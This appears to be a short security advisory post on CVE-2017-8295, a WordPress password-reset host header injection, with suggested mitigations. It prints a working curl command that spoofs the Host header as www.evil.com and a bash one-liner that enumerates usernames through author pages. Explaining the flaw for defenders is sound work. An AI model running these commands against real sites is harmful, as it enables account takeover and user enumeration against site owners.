Released publicly last April, the CVE-2017-8295 is an unpatched Wordpress exploit (0day) that works on every version of the famous CMS until the last 4.8.3 (4.9 is under the hood too) release. This vulnerability consist in a host header injection when triggering the password reset function.
Description of exploit
Following the discovery of Dawid Golunski at ExploitBox.io it is possible to tamper the From field in the mail sent to user when requesting password reset. The email contain a reset password link that can be used by anyone to access Wordpress user session.
A simple command line can trigger this hack :
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword
The host set in the header will be used as the SERVER_NAME in the email sent to the /usr/bin/sendmail wrapper.
It is important to know the user login of the target, but in most of the cases this nickname is available on the public profile page of the website or accessible via a non protected author enumeration .
for i in {1..5}; do curl -s -L -i http://example.com/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done
Scenarios of attack
3 potential scenarios are described by the author :
- Perform a denial of service on the victim email address to exceed user’s quota and force the email to be bounced back to the malicious from address.
- In some cases, target may have set up an autoresponder on his account which will probably attached a copy of the email.
- Try to interact with the victim by spaming the reset password emails and hope for a reply with the email attached.
Solutions concerning this cyber threat
It is important to notice that this a 0day exploit which have been pushed to the Wordpress Security team since July 2016 and no modifications have been done. To prevent this attack, we advice to :
- Block user enumeration
- Move /wp-login.php to another place
- Change default admin account name
You may also disable password recovery functionality or PHP mail() function at your own risk.